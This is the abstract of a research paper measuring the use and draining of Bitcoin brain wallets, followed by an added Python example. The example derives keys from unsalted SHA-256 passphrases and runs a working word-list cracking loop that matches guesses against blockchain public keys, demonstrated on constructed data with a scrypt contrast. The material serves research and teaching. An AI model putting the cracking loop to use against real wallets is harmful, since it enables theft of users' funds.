The Bitcoin Brain Drain: Examining the Use and Abuse of Bitcoin Brain Wallets

In the cryptocurrency Bitcoin, users can deterministically derive, from a password alone, the private keys used to spend their funds. Such “brain wallets” are appealing because they free users from storing their private keys on untrusted computers. Unfortunately, they also enable attackers to conduct unlimited offline password guessing: every candidate password can be turned into a key and checked against the public blockchain without any interaction with the victim. In this paper, we report on the first large-scale measurement of the use of brain wallets in Bitcoin. Using a wide range of word lists, we evaluated around 300 billion passwords. Surprisingly, after excluding activity by researchers, we identified just 884 brain wallets worth around $100K in use from September 2011 to August 2015. We find that all but 21 of these wallets were drained, usually within 24 hours and often within minutes. We find that around a dozen “drainers” are competing to liquidate brain wallets as soon as they are funded. We find no evidence that users who load brain wallets with more bitcoin select stronger passwords, but we do find that brain wallets with weaker passwords are cracked more quickly.
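The derivation and the offline guessing loop it invites, as an added example that is not the paper's own code or data. It assumes the classic brain-wallet scheme in which the private key is a single unsalted SHA-256 of the passphrase and the public key is that scalar times the secp256k1 generator (the page does not spell this out); the passphrases, the "funded" wallet set and the word list are constructed for illustration, and the scrypt-based `hardened_privkey` is a contrast added here, not a scheme the paper evaluates.

```python
"""Brain-wallet key derivation and the offline guessing attack it invites.

Added example (not from the paper). Assumed scheme: priv = SHA-256(passphrase),
pub = priv * G on secp256k1. All passphrases and the word list are constructed.
"""
import hashlib
from typing import Dict, Iterable, Optional, Set, Tuple

# secp256k1 domain parameters (standard constants).
P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)

Point = Optional[Tuple[int, int]]  # None is the point at infinity


def _add(p: Point, q: Point) -> Point:
    """Affine point addition / doubling on secp256k1 (plain, not constant-time)."""
    if p is None:
        return q
    if q is None:
        return p
    x1, y1 = p
    x2, y2 = q
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p == q:
        lam = 3 * x1 * x1 * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def _mul(k: int, point: Point = G) -> Point:
    """Double-and-add scalar multiplication."""
    result: Point = None
    addend = point
    while k:
        if k & 1:
            result = _add(result, addend)
        addend = _add(addend, addend)
        k >>= 1
    return result


def compressed_pubkey(priv: int) -> str:
    """33-byte compressed SEC1 encoding as hex: 02/03 parity prefix + x coordinate."""
    if not 1 <= priv < N:
        raise ValueError("private key out of range")
    x, y = _mul(priv)
    prefix = b"\x02" if y % 2 == 0 else b"\x03"
    return (prefix + x.to_bytes(32, "big")).hex()


def brainwallet_privkey(passphrase: str) -> int:
    """Classic brain-wallet derivation (assumed): one unsalted SHA-256 of the passphrase."""
    return int.from_bytes(hashlib.sha256(passphrase.encode("utf-8")).digest(), "big")


def hardened_privkey(passphrase: str, salt: str) -> int:
    """Contrast added here (not from the paper): a salted, memory-hard KDF.
    Each guess now costs ~16 MiB of memory and thousands of mixing rounds, so
    the same word list takes the attacker far longer per candidate."""
    key = hashlib.scrypt(passphrase.encode("utf-8"), salt=salt.encode("utf-8"),
                         n=2 ** 14, r=8, p=1, dklen=32)
    return int.from_bytes(key, "big")


def crack(target_pubkeys: Set[str], wordlist: Iterable[str]) -> Dict[str, str]:
    """The drainer's loop: derive a key per guess and compare it with public keys
    observed on-chain. Entirely offline; only the attacker's hardware bounds the rate."""
    found: Dict[str, str] = {}
    for guess in wordlist:
        pub = compressed_pubkey(brainwallet_privkey(guess))
        if pub in target_pubkeys:
            found[pub] = guess
    return found


def demo() -> Dict[str, str]:
    # Constructed data: passphrases behind three "funded" wallets and a tiny word list.
    funded = ["password", "correct horse battery staple", "zq7#Lx!9 moat lichen 4418"]
    targets = {compressed_pubkey(brainwallet_privkey(p)) for p in funded}
    wordlist = ["123456", "password", "bitcoin", "letmein",
                "correct horse battery staple", "satoshi"]
    return crack(targets, wordlist)


if __name__ == "__main__":
    for pub, phrase in demo().items():
        print(f"{pub[:16]}...  <-  {phrase!r}")
```

Two of the three constructed wallets fall to the word list; the third survives only because its passphrase is not in the list, which is exactly the property the paper measures across 300 billion guesses. Note that the check needs nothing from the victim: the public keys come from the blockchain, and each guess is one hash plus one scalar multiplication.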
